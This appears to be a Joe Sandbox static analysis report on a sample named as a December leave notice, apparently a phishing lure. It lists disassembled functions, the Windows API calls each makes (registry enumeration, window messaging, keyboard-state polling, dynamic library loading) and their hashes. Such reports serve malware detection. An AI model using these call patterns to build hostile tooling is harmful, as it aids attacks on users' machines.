                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 4d2f8ae3f8b061c62de819dcf4d95c6789193d3feac7def2a892508b7ec5700e
                                                      • Instruction ID: 636160a3b2bea2d108c45a5a7adb33a656f134efa82330784579cf1e2514ce8f
                                                      • Opcode Fuzzy Hash: 4d2f8ae3f8b061c62de819dcf4d95c6789193d3feac7def2a892508b7ec5700e
                                                      • Instruction Fuzzy Hash: E121B271904206ABDB219F65DD0AF9A77F8AF54330F244A1DF8A1D72D0D7B1D941EB20
                                                      Function 00FC9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00FC9653
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FC9683
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00FC9694
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FC96CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 57f38c8e763922c8e38e065d45a1aadff1fbfb99c15d8c954e20bc902181fc99
                                                      • Instruction ID: 2f3676dce8e7fb1195884bd34179ecba1046a9a0414c75abc2e44cfa9a47ae57
                                                      • Opcode Fuzzy Hash: 57f38c8e763922c8e38e065d45a1aadff1fbfb99c15d8c954e20bc902181fc99
                                                      • Instruction Fuzzy Hash: E221B6719042069BDB209F699D4AF9A77E8AF54730F200A1CF8B1D72D0D7F1D841EB20
                                                      Function 00FCDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FCDB0A
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FCDB5E
                                                      • __swprintf.LIBCMT ref: 00FCDB77
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0101DC00), ref: 00FCDBB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: 5ef2c5c1b469e8392dfe930ec25928529e447569a82baa3534b6c628bb2b7f7c
                                                      • Instruction ID: b23e99acc9c7c34c63b8e29b222941d12ffacbc397b94088c9a25c87230dd375
                                                      • Opcode Fuzzy Hash: 5ef2c5c1b469e8392dfe930ec25928529e447569a82baa3534b6c628bb2b7f7c
                                                      • Instruction Fuzzy Hash: E6218035A00109AFCB10EFA5CD86EEEBBB8EF89704B004069F509DB251DB75EA41DB61
                                                      Function 00FBC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FBC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FBC84A
                                                        • Part of subcall function 00FBC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBC85D
                                                        • Part of subcall function 00FBC82D: GetCurrentThreadId.KERNEL32 ref: 00FBC864
                                                        • Part of subcall function 00FBC82D: AttachThreadInput.USER32(00000000), ref: 00FBC86B
                                                      • GetFocus.USER32 ref: 00FBCA05
                                                        • Part of subcall function 00FBC876: GetParent.USER32(?), ref: 00FBC884
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FBCA4E
                                                      • EnumChildWindows.USER32(?,00FBCAC4), ref: 00FBCA76
                                                      • __swprintf.LIBCMT ref: 00FBCA90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                      • String ID: %s%d
                                                      • API String ID: 3187004680-1110647743
                                                      • Opcode ID: 9abf72003b5e0b9f5acbe13efd5604f6a0ee943f4ad204e2e2f264c4d2a36fdf
                                                      • Instruction ID: 30106859fd861f4e38ec5d307dadba65435c75ef2a028516a4157593068f8e2a
                                                      • Opcode Fuzzy Hash: 9abf72003b5e0b9f5acbe13efd5604f6a0ee943f4ad204e2e2f264c4d2a36fdf
                                                      • Instruction Fuzzy Hash: 621181756002097BCB11BFA19C85FEA376DAF48714F008066FE08AA146DB78D545EFB1
                                                      Function 00FE1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FE19F3
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FE1A26
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00FE1B49
                                                      • CloseHandle.KERNEL32(?), ref: 00FE1BBF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: c9ca32ca22838399081df528bb2e804f350fe3096a908ec1e59f47f214a8d72b
                                                      • Instruction ID: 14054561fc4e520dc536ea24c7c9b97e5a9be6f25872d03d3d1df46c6b218987
                                                      • Opcode Fuzzy Hash: c9ca32ca22838399081df528bb2e804f350fe3096a908ec1e59f47f214a8d72b
                                                      • Instruction Fuzzy Hash: AE819270A00205ABDF10AF65CC86BADBBE5BF44720F148459F905AF382D7B9E941DB90
                                                      Function 00FEE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00FEE1D5
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FEE20D
                                                      • IsDlgButtonChecked.USER32(?,00000001), ref: 00FEE248
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FEE269
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FEE281
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ButtonCheckedLongWindow
                                                      • String ID:
                                                      • API String ID: 3188977179-0
                                                      • Opcode ID: 6a849096151565cdae710c64bb39c5a9d765b78dd4a1e2d1bc9739d347efe712
                                                      • Instruction ID: 9291b496234857c25639f67ea43f97811494b07a09f2c4de13d53f0c9be2f4c5
                                                      • Opcode Fuzzy Hash: 6a849096151565cdae710c64bb39c5a9d765b78dd4a1e2d1bc9739d347efe712
                                                      • Instruction Fuzzy Hash: 9F61D274A04284AFDB21DF59DC80FEA77BAFF49320F044099F99997391C779A980EB11
                                                      Function 00FC1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FC1CB4
                                                      • VariantClear.OLEAUT32(00000013), ref: 00FC1D26
                                                      • VariantClear.OLEAUT32(00000000), ref: 00FC1D81
                                                      • VariantClear.OLEAUT32(?), ref: 00FC1DF8
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FC1E26
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      • Opcode ID: f733f3e1c39c7f38f1647282bc95d672a8103f57d6d6df08e0e1ec627b4ff141
                                                      • Instruction ID: 9e8e70032fcb09bb281464eb24fc088ff7e0bbd77e4ce462ade6746fed285698
                                                      • Opcode Fuzzy Hash: f733f3e1c39c7f38f1647282bc95d672a8103f57d6d6df08e0e1ec627b4ff141
                                                      • Instruction Fuzzy Hash: D65149B5A0020AEFDB14CF58C880EAAB7B8FF4D314B158559E95ADB305D734EA51CBA0
                                                      Function 00FE0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00FE06EE
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FE077D
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FE079B
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FE07E1
                                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 00FE07FB
                                                        • Part of subcall function 00F9E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00FCA574,?,?,00000000,00000008), ref: 00F9E675
                                                        • Part of subcall function 00F9E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00FCA574,?,?,00000000,00000008), ref: 00F9E699
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 327935632-0
                                                      • Opcode ID: f5f8da4eecef9d6487164e624cab869c900e118507471d93768efa205769efb1
                                                      • Instruction ID: 58e03086bd4a484488eb5a675c2ea77114af61c284aa4c28afefd22ee1f9fb4d
                                                      • Opcode Fuzzy Hash: f5f8da4eecef9d6487164e624cab869c900e118507471d93768efa205769efb1
                                                      • Instruction Fuzzy Hash: D4517B75A00245DFCB00EFA8C891DEDB7B5BF48310F04805AE955AB392DB78ED41EB90
                                                      Function 00FE2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FE3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE2EEF
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FE2F2E
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FE2F75
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00FE2FA1
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FE2FAE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 3740051246-0
                                                      • Opcode ID: f5977d5aaa3a0f9a9602bf5b8c0571b32e28cf438ee2348a3872b7cc2609a487
                                                      • Instruction ID: 21ae5bebaa3d0aed9c31b8553a3ae3a0a06776feee4826cefcf07870c5dbe878
                                                      • Opcode Fuzzy Hash: f5977d5aaa3a0f9a9602bf5b8c0571b32e28cf438ee2348a3872b7cc2609a487
                                                      • Instruction Fuzzy Hash: 14516B72608244AFD704EF64CC95FAAB7F9BF88314F00481DF59587291EB74E904EB62
                                                      Function 00FECCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d4073a5215bf60178a909ca9b98b39c9e10103b0b156bf629941cdf0c33a105
                                                      • Instruction ID: f06fd2efa4f5db31afd36c6100a8ed20f3724d529587997995111f04722bfa3f
                                                      • Opcode Fuzzy Hash: 2d4073a5215bf60178a909ca9b98b39c9e10103b0b156bf629941cdf0c33a105
                                                      • Instruction Fuzzy Hash: 5141D27AD00284ABC730DF69CC44FA9BB68EB09320F150265F969A72D1C735AD42EBD0
                                                      Function 00FD1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FD12B4
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FD12DD
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FD131C
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FD1341
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FD1349
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: f946980e34d8f03c73781a6549a38176a3e8e153179dd60528c6072c75f48dc1
                                                      • Instruction ID: eac4b2e19bf05baffb167acb365813c9a54c3366fcc716546d33b1eb9b7c8194
                                                      • Opcode Fuzzy Hash: f946980e34d8f03c73781a6549a38176a3e8e153179dd60528c6072c75f48dc1
                                                      • Instruction Fuzzy Hash: 11410E35A00105EFDF01EF64C9819ADBBF5FF08314B188099E956AB362DB35ED01EB51
                                                      Function 00F9B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(000000FF), ref: 00F9B64F
                                                      • ScreenToClient.USER32(00000000,000000FF), ref: 00F9B66C
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00F9B691
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00F9B69F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 8c2ab09ea1a556f7c314a7c0840c9e257a040d805369a1b566e10d5dcf403ef5
                                                      • Instruction ID: 31a7b7ae9fff2ca587681d57fbcd66d64ee9b371ef4d5b6d156afd6f25971892
                                                      • Opcode Fuzzy Hash: 8c2ab09ea1a556f7c314a7c0840c9e257a040d805369a1b566e10d5dcf403ef5
                                                      • Instruction Fuzzy Hash: 38418D31908119BBDF159FA4CC44EE9BBB5BF05324F10435AE869922E0CB35A994EFA1
                                                      Function 00FBB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00FBB369
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00FBB413
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FBB41B
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00FBB429
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FBB431
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: f13d646c418909e0adc6f27fe45b4fd9be7f980f5bb1f51b1ba232390ae01b29
                                                      • Instruction ID: 25d230da1e3bc4a00cbb36db6355dd916c761cb0fa42112f0a782af02cd545be
                                                      • Opcode Fuzzy Hash: f13d646c418909e0adc6f27fe45b4fd9be7f980f5bb1f51b1ba232390ae01b29
                                                      • Instruction Fuzzy Hash: 0331CC72900219EBDF14CFA9D94DADE3BB5FB04329F104229F861AB1C1C7B49914EFA0
                                                      Function 00FBDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00FBDBD7
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FBDBF4
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FBDC2C
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FBDC52
                                                      • _wcsstr.LIBCMT ref: 00FBDC5C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                      • String ID:
                                                      • API String ID: 3902887630-0
                                                      • Opcode ID: ad205b7c43a27cf8bc70096ff5b18fd02e505ec60235c175a8097344870e9a29
                                                      • Instruction ID: 894d8df16c36c67b28e20d66883c52899451bab35a7e248430d9ba9cb57fe01c
                                                      • Opcode Fuzzy Hash: ad205b7c43a27cf8bc70096ff5b18fd02e505ec60235c175a8097344870e9a29
                                                      • Instruction Fuzzy Hash: 0621DAB2604104BBEB255F7A9C49EBB7FA8DF45760F148039F809CA141FAA6DC41F761
                                                      Function 00FBBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FBBC90
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FBBCC2
                                                      • __itow.LIBCMT ref: 00FBBCDA
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FBBD00
                                                      • __itow.LIBCMT ref: 00FBBD11
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: 665b919b15d402e1a46d5b2db4a41fae2322cdde39e44bf8035dac15e49d92c9
                                                      • Instruction ID: 12d3d02b79f952ffd2734bb439ffc4f1395cc5b7a5d11ecf5c65f2e96c914cc5
                                                      • Opcode Fuzzy Hash: 665b919b15d402e1a46d5b2db4a41fae2322cdde39e44bf8035dac15e49d92c9
                                                      • Instruction Fuzzy Hash: 2421C975B00618BFDB21ABA68C45FDE7B68AF4D720F000424F945EB181DBA889056BA1
                                                      Function 00FC6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F850E6: _wcsncpy.LIBCMT ref: 00F850FA
                                                      • GetFileAttributesW.KERNEL32(?,?,?,?,00FC60C3), ref: 00FC6369
                                                      • GetLastError.KERNEL32(?,?,?,00FC60C3), ref: 00FC6374
